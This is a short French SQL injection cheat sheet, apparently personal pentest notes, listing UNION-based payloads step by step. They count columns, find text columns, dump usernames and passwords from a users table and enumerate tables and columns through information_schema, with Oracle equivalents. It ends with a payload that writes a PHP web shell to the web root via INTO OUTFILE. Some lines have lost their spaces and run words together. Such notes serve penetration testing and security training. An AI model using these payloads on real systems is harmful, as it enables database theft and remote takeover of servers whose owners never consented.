' UNION SELECT NULL--'UNIONSELECTNULL,NULL--' UNION SELECT NULL,NULL,NULL--etc.
Trouver une colonne contenant du texte
' UNION SELECT NULL--'UNIONSELECTNULL,NULL--' UNION SELECT NULL,NULL,NULL--etc.Une fois le nombre de colonne trouvé,'UNIONSELECT'a',NULL,NULL--' UNION SELECT NULL,'a',NULL--'UNIONSELECTNULL,NULL,'a'--
Selectionner des colonnes dans une table
' UNION SELECT <column1>, <column2>,... FROM table--Exemple:'UNIONSELECT username, passwordFROM users--
Afficher plusieurs colonnes d'une table sur une seule ligne
' UNION SELECT <column1> || '<separator>' || <column2> FROM table--Exemple:'UNIONSELECT username ||'~'||passwordFROM users--
Recupérer la liste des tables dans la BDD
Exemple:
' UNION SELECT NULL,NULL-- (2 colonnes)Donc,'UNIONSELECT table_name,NULLFROM information_schema.tables--reponse,......users
Récupérer le nom des colonnes dans une table
En suivant l'exemple précédent:
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
Pour Oracle, remplacer 'information_schema.tables' par 'all_tables' et 'information_schema.columns' par 'all_tab_columns'.
PHP RCE
' UNION SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE '/var/www/html/shell.php' #
